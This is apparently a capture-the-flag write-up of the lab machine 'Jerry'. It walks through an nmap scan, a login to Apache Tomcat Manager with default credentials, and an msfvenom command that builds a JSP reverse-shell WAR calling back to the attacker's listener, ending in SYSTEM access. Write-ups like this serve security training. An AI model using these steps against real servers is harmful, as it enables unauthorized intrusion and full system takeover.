# JERRY | 10.10.10.95

## Initial Enumeration

    nmap -v -T4 -sC -sV -oN nmap/initial 10.10.10.95

### Open Ports and Their Services

* 8080 - HTTP - Apache Tomcat/Coyote JSP engine 1.1

### OS Discovery

The version (according to nmap) could be Windows Server 2012 (R2)

## Service Enumeration

The site is running Apache Tomcat, which is a server management app. The page is simply the default page after install.

Tomcat is well-known for having certain default credentials ('tomcat':'s3cret'), so on a whim I enter those and I am logged into the Manager app page:

![](img/manager.png)

This is excellent news. I should have no trouble uploading a reverse shell in .war format.

## Exploitation

I used `msfvenom` to generate a malicious .war file:

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.36 LPORT=6969 -f war -o koopa.war

Then I spun up a netcat listener to catch the koopa shell:

    rlwrap nc -nvlp 6969

I then used the menu in the manager to upload the shell and executed it by clicking on the '/koopa' link:

![](img/koopa.png)

I had a nice reverse shell:

![](img/root-shell.png)

Oh wow, I'm already SYSTEM. That was so easy.

### Flags

The flags are not where they normally are, in fact they are together, making this the easiest box in world history:

![](img/flags.png)

## Conclusion

I don't know. This was dead simple.

Steps:

* Use default creds to login to Tomcat Manager
* Upload a reverse shell as a .war file to own the system
